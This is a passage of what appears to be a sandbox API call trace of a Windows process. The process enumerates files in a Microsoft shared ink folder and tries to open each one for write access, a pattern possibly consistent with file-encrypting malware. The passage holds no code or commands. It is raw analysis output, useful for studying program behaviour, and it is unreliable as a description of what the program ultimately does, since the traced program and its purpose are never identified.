lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpUsedDefaultChar=0x0) returned 57 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0082.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.336] AreFileApisANSI () returned 1 [0082.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 57 [0082.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.336] GetLastError () returned 0x5 [0082.336] GetLastError () returned 0x5 [0082.336] SetLastError (dwErrCode=0x5) [0082.336] GetLastError () returned 0x5 [0082.336] SetLastError (dwErrCode=0x5) [0082.336] GetLastError () returned 0x5 [0082.336] SetLastError (dwErrCode=0x5) [0082.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.336] AreFileApisANSI () returned 1 [0082.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0082.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 57 [0082.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.336] GetLastError () returned 0x5 [0082.336] GetLastError () returned 0x5 [0082.337] SetLastError (dwErrCode=0x5) [0082.337] GetLastError () returned 0x5 [0082.337] SetLastError (dwErrCode=0x5) [0082.337] GetLastError () returned 0x5 [0082.337] SetLastError (dwErrCode=0x5) [0082.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0082.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.337] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0082.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0082.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0082.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0082.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0082.337] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0082.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0082.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.337] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78750 [0082.339] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.339] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a3b058, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a3b058, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1b2d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0082.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0082.340] AreFileApisANSI () returned 1 [0082.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi", lpUsedDefaultChar=0x0) returned 75 [0082.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0082.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.340] AreFileApisANSI () returned 1 [0082.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0082.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85580 [0082.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 75 [0082.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.341] GetFileType (hFile=0x428) returned 0x1 [0082.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0082.341] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.341] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.342] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.342] CloseHandle (hObject=0x428) returned 1 [0082.342] AreFileApisANSI () returned 1 [0082.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0082.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85940 [0082.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 75 [0082.342] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.342] GetLastError () returned 0x5 [0082.342] GetLastError () returned 0x5 [0082.342] SetLastError (dwErrCode=0x5) [0082.342] GetLastError () returned 0x5 [0082.342] SetLastError (dwErrCode=0x5) [0082.342] GetLastError () returned 0x5 [0082.342] SetLastError (dwErrCode=0x5) [0082.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0082.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0082.342] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.343] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a612b1, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a612b1, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xbf28, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0082.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0082.343] AreFileApisANSI () returned 1 [0082.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi", lpUsedDefaultChar=0x0) returned 74 [0082.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0082.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.344] AreFileApisANSI () returned 1 [0082.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0082.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85da0 [0082.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 74 [0082.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.344] GetFileType (hFile=0x428) returned 0x1 [0082.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0082.344] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.344] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.345] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.345] CloseHandle (hObject=0x428) returned 1 [0082.345] AreFileApisANSI () returned 1 [0082.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0082.345] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x854e0 [0082.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 74 [0082.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.345] GetLastError () returned 0x5 [0082.345] GetLastError () returned 0x5 [0082.345] SetLastError (dwErrCode=0x5) [0082.345] GetLastError () returned 0x5 [0082.345] SetLastError (dwErrCode=0x5) [0082.345] GetLastError () returned 0x5 [0082.345] SetLastError (dwErrCode=0x5) [0082.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0082.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.345] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0082.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.346] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.346] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb61e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.346] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.346] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.346] HeapFree 